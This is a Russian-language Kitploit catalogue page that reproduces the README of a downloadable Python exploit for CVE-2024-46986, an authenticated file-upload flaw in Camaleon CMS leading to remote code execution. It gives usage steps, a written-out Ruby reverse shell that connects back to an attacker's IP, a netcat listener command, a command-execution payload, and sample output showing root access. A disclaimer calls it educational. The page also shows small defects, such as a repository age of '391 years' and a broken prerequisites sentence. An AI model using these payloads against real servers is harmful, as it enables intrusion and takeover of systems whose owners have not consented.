Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-46986 — Автоматизированный эксплойт на Python для уязвимости произвольной загрузки файлов в Camaleon CMS (CVE-2024-46986). Поддерживает полезные нагрузки для обратного шелла и выполнения команд для аутентифицированного удаленного выполнения кода. | Kitploit
Инструменты/GitHubGitHub/vidura2/cve-2024-46986
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubvidura2/cve-2024-46986

CVE-2024-46986

Автоматизированный эксплойт на Python для уязвимости произвольной загрузки файлов в Camaleon CMS (CVE-2024-46986). Поддерживает полезные нагрузки для обратного шелла и выполнения команд для аутентифицированного удаленного выполнения кода.

Репозиторий
391 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-46986

Эксплойт для Camaleon CMS - Произвольная загрузка файлов

Этот репозиторий содержит Python-скрипт, который автоматизирует эксплуатацию уязвимости загрузки файлов в Camaleon CMS. Уязвимость позволяет атакующему загружать произвольные файлы (например, Ruby-скрипты) на сервер, что потенциально может привести к удаленному выполнению кода (RCE) или другим серьезным последствиям для безопасности.

Возможности

  • Эксплойт загрузки файлов: Загружает вредоносные Ruby-скрипты на целевой сервер.
  • Варианты полезной нагрузки: Выбор между полезной нагрузкой обратной оболочки и полезной нагрузкой выполнения команд.
  • Повторное выполнение команд: Для полезной нагрузки выполнения команд скрипт позволяет пользователю многократно вводить команды.
  • Автоматизация: Автоматизирует весь процесс с помощью библиотеки Python requests.

Предварительные требования

  • Действительные учетные данные пользователя: Для работы эксплойта требуется аутентифицированная сессия. Вам понадобятся auth_token и действительного пользователя.

_cms_session
  • Python 3.x: Убедитесь, что у вас установлен Python 3.x.

  • Библиотека Python requests: Установите библиотеку requests, если она еще не установлена.

    root@kitploit:~
    pip install requests
    
  • Использование

    root@kitploit:~
    Клонируйте репозиторий:
    
    bash
    

    https://github.com/vidura2/CVE-2024-46986.git cd CVE-2024-46986

    Измените скрипт:

    root@kitploit:~
    Замените заполнители your_auth_token_here, your_session_token_here и https://target_site_here в Python-скрипте на реальные значения.
    При использовании полезной нагрузки обратной оболочки также замените your_ip и your_port на ваш IP-адрес и порт, на котором вы настроите прослушиватель.
    

    Выберите тип полезной нагрузки:

    root@kitploit:~
    Обратная оболочка: Чтобы загрузить обратную оболочку, установите переменную payload_type в скрипте на "reverse_shell".
    Выполнение команд: Чтобы загрузить скрипт, выполняющий системные команды, установите payload_type на "command_execution". Вы сможете многократно вводить команды для выполнения на целевом сервере.
    

    Запустите эксплойт:

    bash

    python exploit_camaleon.py

    При использовании полезной нагрузки выполнения команд вы можете вводить несколько команд:

    bash

    root@kitploit:~
    Enter a system command to execute (or type 'exit' to quit): whoami
    Enter a system command to execute (or type 'exit' to quit): ls
    Enter a system command to execute (or type 'exit' to quit): exit
    

    Типы полезной нагрузки

    1. Обратная оболочка

    Полезная нагрузка обратной оболочки подключается обратно к машине атакующего, позволяя удаленно выполнять код на сервере.

    root@kitploit:~
    Измените IP и порт в Ruby-скрипте внутри Python-кода.
    
    Пример полезной нагрузки:
    
    ruby
    

    require 'socket' s = TCPSocket.open('your_ip', your_port) while (cmd = s.gets) IO.popen(cmd, 'r') do |io| s.print io.read end end

    Настройте прослушиватель на вашей машине с помощью netcat:

    bash

    root@kitploit:~
    nc -lvnp <your_port>
    

    2. Выполнение команд

    Эта полезная нагрузка загружает Ruby-скрипт, который выполняет системные команды (например, whoami) на сервере. Вы можете многократно вводить команды во время выполнения.

    root@kitploit:~
    Скрипт будет постоянно запрашивать команды, пока вы не введете exit.
    Пример:
    
    ruby
    
    system("whoami")
    

    Пример успешного эксплойта

    После успешного выполнения эксплойта вы должны увидеть в терминале вывод, указывающий на успех:

    python

    Exploit executed successfully with payload type: reverse_shell!

    Если вы используете обратную оболочку, прослушиватель netcat должен предоставить вам доступ к оболочке скомпрометированного сервера.

    Для полезной нагрузки выполнения команд:

    bash

    Enter a system command to execute (or type 'exit' to quit): whoami Command 'whoami' executed successfully! Response: root

    Отказ от ответственности

    Этот скрипт предназначен только для образовательных целей. Автор не несет ответственности за любое неправильное использование или ущерб, вызванный этим эксплойтом. Всегда убедитесь, что у вас есть разрешение перед тестированием или эксплуатацией уязвимостей.

    Вклад

    Не стесняйтесь отправлять вопросы или запросы на добавление новых функций или улучшений!

    Лицензия

    Этот проект лицензирован по лицензии MIT - подробнее см. в файле LICENSE.

    Скачать инструмент